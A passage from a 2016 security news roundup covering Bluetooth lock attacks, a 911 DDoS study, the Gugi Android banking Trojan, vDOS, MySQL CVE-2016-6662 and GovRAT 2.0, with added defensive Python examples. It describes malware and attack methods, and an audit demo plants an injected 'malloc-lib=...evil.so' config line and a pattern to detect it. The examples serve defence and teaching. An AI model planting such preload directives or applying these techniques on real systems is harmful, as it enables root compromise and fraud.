Man in the Middle: with one of the many MitM tools I sit between you and the device and control everything you transmit to it. Nothing stops me from altering what you send, say by dropping the "lock" command so the deadbolt never hears it.
The good news is that a video by Zero_Chaos and Granolocks of Pwnie Express shows all of this in action, along with tools you can actually use to detect these attacks.
Locks are not the only Bluetooth devices shown to be vulnerable. Here’s a quick list of just some of the devices that have already been found vulnerable:
Teakettles and coffee machines
Medical devices (including implanted ones)
Fitness trackers
This news should be worrying for people who have invested in a cheap Bluetooth lock for their convenience, and such attacks could be a real problem just waiting to happen.
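The three attacks above come down to one design question: does the lock bind each command to something fresh and secret? The following is an added example written for this article (not code from Merculite Security or any lock vendor) that simulates a lock accepting a static token next to one using a per-session nonce and an HMAC over the command. The PIN, the key, the `unlock:`/`lock:` frame format and the HMAC-SHA256 construction are all assumptions chosen for illustration; no real product is modelled.

```python
import hashlib
import hmac
import os

# Constructed sample values: a static PIN like several tested locks used, and a
# 16-byte shared key for the challenge-response variant. Neither is from a real product.
STATIC_PIN = b"123456"
SHARED_KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")


class StaticTokenLock:
    """The pattern behind the plaintext and replay findings: the lock compares
    whatever arrives with a constant, so a sniffed frame is as good as the app."""

    def __init__(self, pin):
        self._pin = pin
        self.open = False

    def receive(self, frame):
        cmd, _, token = frame.partition(b":")
        if hmac.compare_digest(token, self._pin):
            self.open = (cmd == b"unlock")
            return True
        return False


class ChallengeResponseLock:
    """The lock issues a fresh random nonce per session and expects
    HMAC-SHA256(key, nonce || command). The nonce defeats replay; the MAC over
    the command defeats a man in the middle rewriting it."""

    def __init__(self, key):
        self._key = key
        self._nonce = None
        self.open = False

    def challenge(self):
        self._nonce = os.urandom(16)
        return self._nonce

    def receive(self, frame):
        cmd, _, tag = frame.partition(b":")
        if self._nonce is None:
            return False
        expected = hmac.new(self._key, self._nonce + cmd, hashlib.sha256).digest()
        self._nonce = None                      # single use, whether or not it matches
        if hmac.compare_digest(tag, expected):
            self.open = (cmd == b"unlock")
            return True
        return False


def phone_static(cmd):
    return cmd + b":" + STATIC_PIN            # the PIN crosses the air in the clear


def phone_cr(cmd, nonce):
    return cmd + b":" + hmac.new(SHARED_KEY, nonce + cmd, hashlib.sha256).digest()


def replay_attack_static():
    """Sniff one legitimate unlock frame, then replay it after the owner has left."""
    lock = StaticTokenLock(STATIC_PIN)
    sniffed = phone_static(b"unlock")
    lock.receive(sniffed)
    lock.receive(phone_static(b"lock"))
    lock.receive(sniffed)                     # attacker replays the recording
    return lock.open                          # True: the lock cannot tell old from new


def replay_attack_cr():
    lock = ChallengeResponseLock(SHARED_KEY)
    sniffed = phone_cr(b"unlock", lock.challenge())
    lock.receive(sniffed)
    lock.receive(phone_cr(b"lock", lock.challenge()))
    lock.challenge()                          # new session, new nonce
    lock.receive(sniffed)                     # old tag was computed over the old nonce
    return lock.open                          # False: replay rejected


def mitm_swap_command_static():
    """Owner sends 'lock'; the attacker in the middle rewrites it to 'unlock'."""
    lock = StaticTokenLock(STATIC_PIN)
    frame = phone_static(b"lock")
    lock.receive(b"unlock" + frame[len(b"lock"):])
    return lock.open                          # True: nothing binds the command to the token


def mitm_swap_command_cr():
    lock = ChallengeResponseLock(SHARED_KEY)
    frame = phone_cr(b"lock", lock.challenge())
    accepted = lock.receive(b"unlock" + frame[len(b"lock"):])
    return accepted                           # False: the MAC covers the command
```

The interesting property is that the challenge-response lock does not need to hide the frame at all: the sniffer sees the nonce and the tag, but without the key it can neither forge a tag for the next nonce nor change the command under the existing one. Encryption without freshness, which is what the replayable locks had, buys nothing.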

Here's How Hackers Can Disrupt '911' Emergency System and Put Your Life at Risk
13.9.2016 thehackernews Hacking
What would it take for hackers to significantly disrupt the US' 911 emergency call system?
It only takes 6,000 Smartphones.
Yes, you heard it right!
According to new research published last week, a malicious attacker can leverage a botnet of infected smartphone devices located throughout the country to knock the 911 service offline in an entire state, and possibly the whole United States, for days.
The attacker would only need 6,000 infected smartphones to launch automated Distributed Denial of Service (DDoS) attacks against 911 service in an entire state by placing simultaneous calls from the botnet devices to the emergency numbers.
And as few as 200,000 infected mobile phones could knock the 911 emergency call system offline across the entire US.
Where Does the Problem Lie?
Researchers from Ben-Gurion University of the Negev's Cyber-Security Research Center say the problem lies in the fact that current US Federal Communications Commission (FCC) regulations require that all calls to 911 be routed immediately to emergency services, regardless of the caller's identifiers.
In other words, mobile carriers route every 911 call to a local Public Safety Answering Point (PSAP) without verifying the caller's identity or even whether the caller is a subscriber of the mobile network.
These identifiers are the phone's International Mobile Subscriber Identity (IMSI) and International Mobile Station Equipment Identity (IMEI), which identify the subscription and the handset hardware, respectively.
How can Attackers Carry Out such Attacks?
All an attacker needs is a mobile botnet from which to launch a TDoS (Telephony Denial of Service) attack. The botnet can be assembled in two ways:
By infecting smartphones with malware, or
By buying the smartphones needed to launch the TDoS attack.
The researchers Mordechai Guri, Yisroel Mirsky, and Yuval Elovici note in a paper [PDF] that an attacker could exploit cellular network protocols by placing a rootkit or persistent, low-level malware within the baseband firmware of a mobile phone.
The rootkit can then mask and randomize all cellular identifiers, causing the cell phone to have no genuine identification within the cellular networks.
"Such anonymised phones [bots] can issue repeated [911] emergency calls that can not be blocked by the network or the emergency call centers, technically or legally," the team notes in the paper.
Secondly, an attacker could simply buy 6,000 or 200,000 smartphones, at a cost of about $100,000 or $3.4 million respectively, a small sum for a state-sponsored attacker, to jam the 911 system of an entire state or of the whole country.
This TDoS scenario should not come as a surprise: during the 9/11 attacks on the Twin Towers in New York City, thousands of legitimate callers dialing 911 at the same time overloaded both the telephony network and the emergency reporting system, an unintentional denial of service.
Of course, the team did not perform this attack in an actual, nationwide system. It created a small simulated cellular network based on North Carolina's 911 network and attacked it instead.
The team used bot-infected Samsung Galaxy S3, S4 and S5 smartphones running Android 4.4 and 5.x to test their work.
How Can We Prevent Such DDoS Campaigns Against Emergency Services?
Such attacks are currently difficult to block, as PSAPs have no way to blacklist fake calls, and blocking at the network level is not possible beyond selectively turning off cellular service in bot-infested areas.
However, the researchers suggest countermeasures that could mitigate such attacks, which include:
Storing IMEIs and other unique identifiers in a trusted memory region of the phone (such as ARM TrustZone), where malware cannot alter them.
Implementing a mandatory "Call Firewall" on mobile devices to block DDoS activity such as frequent 911 calls.
Since these changes would require cooperation among government, security professionals, cellular carriers, emergency services and others, such significant changes are unlikely to happen soon.
For in-depth and detailed information about the attack and possible mitigation procedures for US authorities, you can head on to the research paper [PDF] titled, '9-1-1 DDoS: Threat, Analysis and Mitigation.'
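The "Call Firewall" countermeasure is easy to get wrong in the other direction: a limiter that blocks a genuine caller's second attempt is worse than the attack it prevents. The following is an added example, written for this article and not the researchers' code, of one interpretation of such a device-side limiter as a sliding window over recent emergency calls. The set of emergency numbers, the threshold of three calls per five minutes, and the two call patterns fed through it are all assumptions constructed for illustration.

```python
from collections import deque

# Assumption: which dialled strings count as emergency calls.
EMERGENCY_NUMBERS = {"911", "112"}


class CallFirewall:
    """Sliding-window limiter for outgoing emergency calls.

    Design points a real implementation must respect:
    * it has to sit below the application layer (ideally in trusted firmware),
      otherwise the malware placing the calls simply bypasses it;
    * the threshold must be generous enough that a person redialling after a
      dropped call is never blocked; only machine-speed repetition trips it;
    * non-emergency numbers are never touched.
    """

    def __init__(self, max_calls=3, window_s=300.0):
        self.max_calls = max_calls
        self.window_s = window_s
        self._recent = deque()          # timestamps of emergency calls that were allowed

    def allow(self, number, now):
        if number not in EMERGENCY_NUMBERS:
            return True
        # Forget calls that have aged out of the window.
        while self._recent and now - self._recent[0] >= self.window_s:
            self._recent.popleft()
        if len(self._recent) >= self.max_calls:
            return False                # blocked: too many emergency calls in the window
        self._recent.append(now)
        return True


def run_scenario(call_times, number="911"):
    """Feed a sequence of call attempts (timestamps in seconds) through a fresh
    firewall and return how many were allowed through."""
    fw = CallFirewall()
    return sum(fw.allow(number, t) for t in call_times)


# Constructed scenarios (not measured data).
HUMAN_REDIAL = [0.0, 25.0, 70.0]                 # a caller retrying after two dropped calls
BOT_BURST = [float(i) for i in range(600)]       # a bot dialling once per second for ten minutes
```

With these parameters the human scenario gets all three calls through, while the bot scenario gets three calls per window, six in ten minutes instead of six hundred. Attempts that were blocked do not extend the window, so a legitimate caller who hits the limit is unblocked as soon as the earliest call ages out rather than being locked out indefinitely.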

Gugi: from an SMS Trojan to a Mobile-Banking Trojan
13.9.2016 Kaspersky  Virus
In the previous article, we described the mechanisms used by Trojan-Banker.AndroidOS.Gugi.c to bypass a number of new Android 6 security features. In this article, we review the entire Gugi mobile-banking Trojan family in more detail.

The use of WebSocket by Gugi

The mobile-banking Trojan family Trojan-Banker.AndroidOS.Gugi is interesting for its use of the WebSocket protocol to talk to its command-and-control servers. This protocol combines the advantages of HTTP with those of ordinary sockets: no extra ports need to be opened on the device, because the connection is set up through a normal HTTP request on the standard port 80, and once upgraded the channel is full duplex, so real-time data exchange is possible.

It is worth noting that even though this technology is user-friendly, it is not that popular among attackers. Among all the mobile Trojans that utilize WebSocket technology, more than 90% are related to the Gugi family.
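Because the WebSocket upgrade rides on an ordinary HTTP request, a proxy or network sensor that sees port 80 traffic can tell a plain web request from an established bidirectional channel: the server must answer `101 Switching Protocols` with a `Sec-WebSocket-Accept` derived from the client's `Sec-WebSocket-Key` (RFC 6455). The following is an added example for this article, not Kaspersky Lab's code, that parses recorded request/response pairs, recomputes the expected accept value, and reports completed WebSocket channels to hosts outside an allowlist. The sample flows, the hosts and the allowlist are constructed for illustration and are not real Gugi traffic.

```python
import base64
import hashlib

# Magic GUID fixed by RFC 6455 for the Sec-WebSocket-Accept computation.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def parse_http_message(raw):
    """Split a raw HTTP/1.1 request or response into (start line, {lower-case header: value})."""
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def expected_accept(client_key):
    """Sec-WebSocket-Accept the server must return for a given Sec-WebSocket-Key."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def is_upgrade_request(start_line, headers):
    connection_tokens = [t.strip().lower() for t in headers.get("connection", "").split(",")]
    return (start_line.startswith("GET ")
            and headers.get("upgrade", "").lower() == "websocket"
            and "upgrade" in connection_tokens
            and "sec-websocket-key" in headers)


def handshake_completed(request, response):
    """True only if the client asked for an upgrade and the server answered 101 with
    the correct accept value, i.e. a full-duplex channel now exists on this flow."""
    start, req_h = parse_http_message(request)
    if not is_upgrade_request(start, req_h):
        return False
    status, resp_h = parse_http_message(response)
    return (status.startswith("HTTP/1.1 101")
            and resp_h.get("sec-websocket-accept") == expected_accept(req_h["sec-websocket-key"]))


def find_unexpected_websockets(flows, allowlist):
    """Hosts of flows that established a WebSocket channel and are not on the allowlist."""
    return [f["host"] for f in flows
            if f["host"] not in allowlist and handshake_completed(f["request"], f["response"])]


# Constructed sample flows, as a proxy or NSM sensor might record them.
_KEY = b"dGhlIHNhbXBsZSBub25jZQ=="           # the RFC 6455 example key
_OK_101 = (b"HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
           b"Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=\r\n\r\n")


def _upgrade_request(host, path):
    return (b"GET " + path + b" HTTP/1.1\r\nHost: " + host + b"\r\nUpgrade: websocket\r\n"
            b"Connection: Upgrade\r\nSec-WebSocket-Key: " + _KEY + b"\r\n"
            b"Sec-WebSocket-Version: 13\r\n\r\n")


SAMPLE_FLOWS = [
    # a legitimate chat service on the allowlist
    {"host": "chat.example.com",
     "request": _upgrade_request(b"chat.example.com", b"/socket"), "response": _OK_101},
    # bare IP on port 80 with a completed upgrade: the shape of a Gugi-style C2 channel
    {"host": "203.0.113.10",
     "request": _upgrade_request(b"203.0.113.10", b"/ws"), "response": _OK_101},
    # upgrade attempted but refused by the server: plain HTTP, no channel
    {"host": "198.51.100.7",
     "request": _upgrade_request(b"198.51.100.7", b"/ws"),
     "response": b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"},
]
ALLOWLIST = {"chat.example.com"}
```

Checking the accept value rather than just the `Upgrade` header matters: a client can send upgrade headers to any server, but only a server that actually speaks WebSocket replies with the right value, so a match means a live channel exists, which is the event worth alerting on for a device that is not a browser. The check only applies where the handshake is visible in the clear, which is the case for Gugi's port 80 traffic but not for `wss://` over TLS.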

WebSocket Usage in Mobile SMS Trojans

We registered the first use of WebSocket in a mobile Trojan at the end of December 2013, in Trojan-SMS.AndroidOS.FakeInst.fn. Judging by the code, that Trojan was created by the same attackers who built the Trojan-Banker.AndroidOS.Gugi family.

During the initial registration, the FakeInst.fn Trojan uploads a large amount of device-related data to its server. The data includes the telephone number, the carrier information, IMEI, IMSI, etc.

From the server, the malware may receive a JSON message with the following commands (and the data for each command):

SMS – send a text message with specified text to a specified number;
intercept – enable or disable the interception of incoming SMS messages;
adres – change a command-and-control server address;
port – change a command-and-control server port;
contacts – send a bulk SMS message with specified content to all the contact numbers listed on the infected device.
In addition, the Trojan steals all outgoing SMS messages.

In the middle of January 2014, just a couple of weeks after we discovered FakeInst.fn, a new version of the Trojan appeared. It no longer used WebSocket; instead it communicated over plain HTTP (GET and POST requests). Among all the installation packages of this Trojan, we found only two (dating from the middle of March 2014) that used WebSocket. Everything indicated that the attackers had decided to drop the technology for a while. They started using it again almost two years later, in the Gugi family.

From SMS Trojans to Mobile Banking Trojans

Two years after we found the first WebSocket-based version of Trojan-SMS.AndroidOS.FakeInst.fn, a new WebSocket-using Trojan appeared: Trojan-Banker.AndroidOS.Gugi.a.

The Gugi code shares many variable and method names with the Trojan-SMS.AndroidOS.FakeInst.fn code. The major changes in Gugi were the addition of a phishing window to steal the user's credit-card data and the use of WebSocket: every Gugi installation package we have detected uses WebSocket to communicate with the command-and-control server. The attackers had thus moved from Trojan-SMS to Trojan-Banker.

Evolution of the Trojan-Banker.AndroidOS.Gugi

The evolution of the Gugi Trojan can be split into two stages:


The first stage started in the middle of December 2015. The word “Fanta” is used within the name of all versions of the Trojan related to this stage, for example, “Fanta v.1.0”.

On request from the command-and-control server, Gugi Trojan version 1.0 could perform the following actions:

stop its operation;
steal all the contacts from the device;
steal all the SMS messages from the device;
send an SMS message with specified text to a specified number;
send a USSD request;
steal SMS messages from a specified group/conversation.
In late December 2015, we spotted the next version of Gugi, “Fanta v.1.1”. Its major difference from the previous version was that the code had a way of disabling the phishing window (we would like to remind you that Gugi can also be used as an SMS Trojan). Another new feature allowed contacts to be added to the infected device at the request of the server. This version was spread much more actively than the first one.

At the beginning of February 2016, we detected two new versions of Gugi, "Fanta v2.0" and "Fanta v2.1", with an increased focus on banking. First, they came with a new phishing window for stealing the username and password of the mobile-banking app of one of the largest Russian banks. Secondly, the Trojan's code included a list of phone numbers belonging to two Russian banks: incoming SMS messages from these numbers were not only sent to the attackers' server (like all other SMS messages) but were also hidden from the user.

These versions had a phishing window, shown either on request from the server or right after the smartphone had booted up. The window would not close until the user had entered their data.

Then, in the middle of March 2016, we found "Fanta v.2.2". This became the most popular version of all, accounting for more than 50% of all installation packages of the "Fanta" stage. Starting from this version, phishing windows were drawn over banking applications and Google Play.


Phishing window over Google Play Store

One more phishing window started to appear, right before the window for stealing credit-card data. This window read: “Link your credit card to Google Play Store and get 200 rubles for any apps!”

Additionally, starting from this version, the Trojan actively resists removal. If the malware holds Device Administrator rights, it can be removed only after those rights are revoked. Therefore, whenever the Trojan lacks Device Administrator rights, it aggressively demands them, drawing its window over the device settings screen.

In April 2016, we found the most recent "Fanta" version to date, "Fanta v.2.3". It had only one significant change: if the user revokes the Trojan's Device Administrator rights, the malware changes the device password, effectively locking the device.

All versions of “Fanta” are detected by the Kaspersky Lab products as Trojan-Banker.AndroidOS.Gugi.a.


The first file related to the second stage, “Lime”, was found a week before “Fanta v2.3” appeared, at the beginning of April 2016.

The installation package code for "Lime" appears to be derived from the Fanta stage: the word "Fanta" was removed from the code and from the version names and replaced by "Lime" in some lines. The same name, "Lime", appears in the administration panel through which the attackers control the malware.


Trojan’s administration panel

Versions of the Trojan relating to the “Lime” stage do not change the device password when Device Administrator rights are disabled.

The first file we discovered, in April 2016, was version 1.1 and, judging by the code, was a test build. The next installation package of the "Lime" stage was discovered in the middle of May 2016; it carried the same version number, 1.1, but had improved functionality.

The major change in version 1.1 of the “Lime” stage was that it showed new phishing windows. At that time, the Trojan could attack five banking apps of various Russian banks. Additionally, it had a new command to get the list of rules for processing incoming SMS messages. These rules define which messages should be hidden from the user and which messages should be replied to with specific messages.

Later in May 2016, we discovered files the authors had labelled 1.2 and 1.5, even though their functionality had not changed.

Meanwhile, a new version of the Android OS, version 6.0, was released with security features that did not let the Trojan function properly. In June, we found a new version of the Trojan, 2.0, in which the malefactors had added support for Android 6. On Android 6 devices, the Trojan first requests permission to draw over other apps. Then, using the permission to its own advantage, it practically blocks the device, forcing the user to give Device Administrator rights to the malicious application as well as permission to read and send SMS messages and make calls.

Versions 3.0 and 3.1, which were found in July, have the same features as version 2.0 and utilize the same command-and-control server but different ports. Only one installation package for each version has been found by us. At the same time, version 2.0 continues to be actively spread.

All of the “Lime”-stage versions are detected by Kaspersky Lab products as Trojan-Banker.AndroidOS.Gugi.b and Trojan-Banker.AndroidOS.Gugi.c.


The Trojan is actively distributed via SMS spam containing a link to phishing web pages, which claim that the user has received an MMS picture.


Information about MMS message on phishing website

If the "show" button in the message is clicked, Trojan-Banker.AndroidOS.Gugi is downloaded onto the device. The file downloaded from such a website is very likely to have a name similar to img09127639.jpg.apk, a double extension chosen to make the APK look like an image.

As we wrote in a previous post, we have observed explosive growth in Trojan-Banker.AndroidOS.Gugi attacks: August saw three times as many attacked users as July, and almost 20 times as many as June.


Number of Kaspersky Lab mobile product users attacked by the Trojan-Banker.AndroidOS.Gugi mobile-banking Trojan family

Today, most attacks come from Lime version 2.0. All of the Trojan's known active command-and-control servers belong to Lime versions 1.5 to 3.1; not a single "Fanta" server known to us has been reachable since the middle of August 2016.

More than 93% of attacked users were located in Russia.

2 Israeli teens arrested for allegedly running the vDoS booter
13.9.2016 securityaffairs Hacking

Israeli law enforcement arrested two young men suspected of operating the notorious vDOS booter.
Israeli authorities have arrested two alleged operators of the DDoS-for-hire service vDOS following an investigation by the FBI.

Security journalist Brian Krebs reported that the duo behind the vDOS booter service had earned more than $600,000 over the past two years. The service is estimated to have launched 150,000 DDoS attacks, and customers rented it for between $20 and $200 per month. According to experts, vDOS had been active since 2012.

“vDOS — a “booter” service that has earned in excess of $600,000 over the past two years helping customers coordinate more than 150,000 so-called distributed denial-of-service (DDoS) attacks designed to knock Web sites offline — has been massively hacked, spilling secrets about tens of thousands of paying customers and their targets.” wrote Krebs in his analysis.

Krebs investigated vDOS after obtaining its database in July 2016; the database had leaked after the booter service itself was hacked. The data points to two young men in Israel as the service's masterminds and shows that other young hackers, mostly from the US, handled its support services.

Krebs analyzed configuration files and real IP addresses that pointed to two Israeli nationals, Itay Huri and Yarden Bidani, who used the aliases P1st and AppleJ4ck. Krebs' website was hit by a DDoS attack that peaked at nearly 140 Gbps shortly after he disclosed his findings about the suspects.

As Krebs was publishing his findings, Israeli media reported the arrest of the two men at the request of the FBI.

Israeli police arrested the two alleged owners of vDOS, placed them under house arrest for 10 days and banned them from using the Internet and any telecommunications equipment for 30 days.

The duo recently published a technical paper on DDoS attacks on the website of the Israeli security publication Digital Whisper, and the Twitter account one of them used listed vDOS as his personal website.


The vDOS website (vdos-s.com) is now offline.

New MySQL Zero Days — Hacking Website Databases
13.9.2016 securityaffairs Vulnerebility
Two critical zero-day vulnerabilities have been discovered in MySQL, the world's second most popular database management system, that could allow an attacker to take full control of the database server.
Polish security researcher Dawid Golunski discovered the two zero-days, CVE-2016-6662 and CVE-2016-6663, which affect all currently supported MySQL versions as well as its forks MariaDB and PerconaDB.
Golunski further went on to publish details and a proof-of-concept exploit code for CVE-2016-6662 after informing Oracle of both issues, along with vendors of MariaDB and PerconaDB.
Both MariaDB and PerconaDB had fixed the vulnerabilities, but Oracle had not.
The vulnerability (CVE-2016-6662) can be exploited by hackers to inject malicious settings into MySQL configuration files or create their own malicious ones.
Exploitation Vector
The flaw can be exploited either through an SQL injection vulnerability in an application or by an attacker with authenticated access to a MySQL database (over a network connection or through web interfaces such as phpMyAdmin).
"A successful exploitation [of CVE-2016-6662] could allow attackers to execute arbitrary code with root privileges which would then allow them to fully compromise the server on which an affected version of MySQL is running," Golunski explained in an advisory published today.
This could result in complete compromise of the server running the affected MySQL version.
The researcher also warned that the vulnerability can be exploited even when SELinux or AppArmor is enabled with the default policies that the major Linux distributions ship for the MySQL service.
The flaw actually resides in the mysqld_safe script, which many default MySQL packages and installations use as a wrapper to start the MySQL server process.
The mysqld_safe wrapper runs as root, while the mysqld process it launches drops its privileges to the mysql user, Golunski explained. Because the wrapper reads the configuration files with root privileges, a library path accepted from those files is preloaded into a process that starts as root.
"If an attacker managed to inject a path to their malicious library within the config, they would be able to preload an arbitrary library and thus execute arbitrary code with root privileges when MySQL service is restarted (manually, via a system update, package update, system reboot, etc.)"
The researcher will soon release details and full exploit code for CVE-2016-6663, a flaw that lets low-privileged attackers exploit CVE-2016-6662 trivially.
No MySQL Patch Available Yet
Golunski reported the zero-day flaws to Oracle on July 29 and to the other affected vendors the same day.
Oracle acknowledged and triaged the report, scheduling the fix for its next Critical Patch Update (CPU) on October 18, 2016, while MariaDB and PerconaDB patched their versions of the database software before the end of August.
Since more than 40 days had passed since his report and the two other vendors had already published their patches, Golunski said he decided to go public with the details of the zero-days.
Temporary Mitigation:
Until Oracle fixes the problem in its next CPU, you can apply the temporary mitigations proposed by the researcher to protect your servers.
"As temporary mitigations, users should ensure that no MySQL config files are owned by the mysql user, and create root-owned dummy my.cnf files that are not in use," Golunski wrote.
But remember, the above mitigations are just workarounds, so you are advised to apply vendor patches as soon as they become available.
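The mitigation above is easy to check mechanically. The following is an added audit script written for this article, not the researcher's exploit or any vendor tool: it walks the configuration files mysqld_safe reads (including `!include` and `!includedir` entries), reports any file owned by the mysql user or writable by group or world, and flags `malloc-lib` directives, the option through which mysqld_safe preloads a library. The default path list is an assumption about typical Linux packaging; pass your own if your site uses `--defaults-file`. The `demo()` function builds constructed sample files in a temporary directory so the checks can be exercised without touching a real server.

```python
import os
import pwd
import re
import stat
import tempfile

# Files mysqld_safe/mysqld read on a typical Linux install (assumption: adjust for
# your packaging; --defaults-file and !include lines can add others).
DEFAULT_CONFIG_PATHS = [
    "/etc/my.cnf",
    "/etc/mysql/my.cnf",
    "/usr/etc/my.cnf",
    os.path.expanduser("~/.my.cnf"),
]

# mysqld_safe turns this option into an LD_PRELOAD of the named library.
MALLOC_LIB = re.compile(r"^\s*malloc[-_]lib\s*=\s*(\S.*?)\s*$", re.IGNORECASE)
INCLUDE = re.compile(r"^\s*!include(dir)?\s+(.+?)\s*$")


def audit_config_file(path, mysql_uid, seen=None):
    """Return a list of findings for one config file and anything it includes."""
    seen = set() if seen is None else seen
    findings = []
    path = os.path.realpath(path)
    if path in seen or not os.path.isfile(path):
        return findings
    seen.add(path)

    st = os.stat(path)
    if st.st_uid == mysql_uid:
        findings.append(f"{path}: owned by the mysql user, so the database process can rewrite it")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    elif st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable")

    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            m = MALLOC_LIB.match(line)
            if m:
                findings.append(f"{path}:{lineno}: malloc-lib={m.group(1)} "
                                f"(mysqld_safe preloads this library as root)")
            inc = INCLUDE.match(line)
            if inc:
                target = inc.group(2)
                if inc.group(1):                      # !includedir: every *.cnf inside
                    if os.path.isdir(target):
                        for name in sorted(os.listdir(target)):
                            if name.endswith(".cnf"):
                                findings += audit_config_file(os.path.join(target, name), mysql_uid, seen)
                else:                                 # !include: a single file
                    findings += audit_config_file(target, mysql_uid, seen)
    return findings


def audit(paths=DEFAULT_CONFIG_PATHS, mysql_user="mysql"):
    """Audit every default config path against the given service account."""
    try:
        uid = pwd.getpwnam(mysql_user).pw_uid
    except KeyError:
        return [f"no user named {mysql_user!r}; nothing audited"]
    seen, findings = set(), []
    for p in paths:
        findings += audit_config_file(p, uid, seen)
    return findings


def demo():
    """Constructed inputs: a tampered config that includes a directory holding a clean
    one. The tampered file is treated as mysql-owned by passing the current uid as the
    mysql uid; the clean file is audited against a uid that is not the owner's."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "my.cnf")
    with open(bad, "w") as fh:
        fh.write("[mysqld]\nmalloc-lib=/var/lib/mysql/evil.so\n!includedir " + d + "/conf.d\n")
    os.chmod(bad, 0o666)
    os.mkdir(os.path.join(d, "conf.d"))
    good = os.path.join(d, "conf.d", "clean.cnf")
    with open(good, "w") as fh:
        fh.write("[mysqld]\nbind-address=127.0.0.1\n")
    os.chmod(good, 0o644)
    return audit_config_file(bad, os.getuid()), audit_config_file(good, os.getuid() + 1)


if __name__ == "__main__":
    for finding in audit():
        print(finding)
```

Run it as root so that every path is readable. A clean result means no file the wrapper will read can be written by the database account, which is exactly the condition the researcher's workaround aims for; it does not replace the vendor patch, since a future option other than `malloc-lib` could be abused the same way.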

GovRAT 2.0 continues to target US companies and Government
13.9.2016 securityaffairs Virus

Malware authors have developed a new version of GovRAT, called GovRAT 2.0, that has been used to target the US government and many other organizations in the country.
GovRAT is a long-standing cyber-espionage tool: it has been in the wild since 2014 and has been used by various threat actors over the years.

Security experts from the threat intelligence company InfoArmor first spotted the malware in 2015.

GovRAT is a malware-building platform that comes bundled with digital certificates for code signing. The same certificates were initially offered for sale on TheRealDeal Market, a black marketplace hosted on the Tor network. In 2015 GovRAT was offered for 1.25 Bitcoin, but experts also observed its creator offering it in private sales.


GovRAT digitally signs its malicious code with standard code-signing tooling (Microsoft SignTool, WinTrust and Authenticode), so a signed sample passes any check that only verifies the presence of a valid signature rather than the identity of the signer. Experts believe the end customers for GovRAT are APT groups targeting political, diplomatic and military personnel of more than 15 governments worldwide.

The author of GovRAT, who goes by the moniker "bestbuy" online, had been offering its source code, including a code-signing certificate, for nearly 4.5 Bitcoin on the TheRealDeal black market.

The availability of the source code lets anyone modify and improve it, which is exactly what is happening with GovRAT 2.0.

Malware authors recently released a new version of the RAT, GovRAT 2.0, which has been used to target the US government and other organizations in the country.


After InfoArmor's first report, bestbuy also started using the moniker "Popopret."

The RAT was delivered through spear-phishing and drive-by download attacks. Its victims include government and military organizations, and data stolen from military organizations was also offered for sale on the black market.

GovRAT 2.0 includes several new features, among them improved detection evasion, remote command execution and automatic mapping of hard disks and network shares.

According to experts from InfoArmor, government and military agencies are increasingly targeted by threat actors using this malware.

Below is the complete list of features introduced in GovRAT 2.0, as reported in the InfoArmor report “GOVRAT V2.0 ATTACKING US MILITARY AND GOVERNMENT”.

Access C&C with any browser.
Compile C&C for Linux OR Windows.
Cannot be reversed without the private key. 0day anti-debugging.
Automatically maps all hard disks and network disks.
Creates a map of files to browse even when the target is offline.
Remote shell/command execution.
Upload files or Upload and Execute files to target.
Download files from target. All files are compressed with LZMA for faster downloads and encrypted on transport.
Customized encryption for communications. No two machines will use the same key (ever).
SSL Support for communication. (you have to get your own *Valid* SSL certificate to use this).
Does not use SOCKS libraries. Uses special Windows APIs to communicate and cannot be blocked.
C&C creates a one-time password every time the user logs in for extra security.
Comes with source for FUD keylogger that sends keys to another server.
Excellent for long term campaigns where a stable connection is needed.
Another interesting feature of the malware is its ability to spread via USB devices and network shares, like a worm.

Prices range from $1,000 for the basic binary and the command-and-control code, up to $6,000 for a complete package that includes the source code of every component of the malicious infrastructure and the extra modules.

Security experts have discovered several offers for credentials for many U.S. government domains, including gsa.gov, va.gov, nasa.gov, nps.gov, faa.gov and state.gov, and for domains related to the U.S. military, such as navy.mil, mail.mil, army.mil and af.mil.

“On one of the underground communities in the TOR network, the same bad actor is selling compromised credentials relating to FTP servers of various US Government entities” reads the report. “In addition to NOAA.gov, USPS.gov and CDG.gov, the bad actor is selling several credentials for subdomains at JPL.NASA.gov and NAVY.mil:”

The credentials have also been used in multiple GovRAT 2.0 attacks. Experts also observed the use of another 33,000 credentials stolen from US government, research and educational organizations, supplied to the malware creator by the hacker known as “PoM,” aka Peace_of_Mind or Peace.

“There is another bad actor identified as “PoM,” who is a partner of popopret, and is selling 33,000 records with credentials related to the US Government and various research and educational organizations.” reads the report. “In the post description, he outlines that the data was hashed but he was able to decrypt it and can potentially use it for “accessing other agencies,” as well as for use in SE (social engineering) and spear phishing campaigns. PoM provides the stolen data of government and military employees to other actors using GovRAT v2.0 for highly targeted malware delivery. After a thorough analysis, it was determined that most of this data was accessed from the hacked National Institute of Building Sciences (http://www.nibs.org/) website. It contains numerous members from the research, educational, government and military community. “

For more details on GovRAT 2.0, take a look at the report published by InfoArmor.

Hacking wannabe hackers: watch out Facebook Hacker Tools!
13.9.2016 securityaffairs Hacking

Everyone is a potential victim, even the wannabe hackers who use Facebook Hacker Tools to try to hack into friends’ accounts.
When dealing with cybercrime everyone is a potential victim, even the hackers. This is the case of a Crimeware-as-a-Service (CaaS) scam that turns wannabe crooks into victims.
For those looking to hack other people’s Facebook accounts, there is a marketplace of Facebook Hacker tools that promise to do it without any specific knowledge.
Crooks are using Google Drive to host new Facebook Hacker Tools that allow them to steal the credentials of would-be hackers who try to hack other users’ accounts on the Facebook social network.

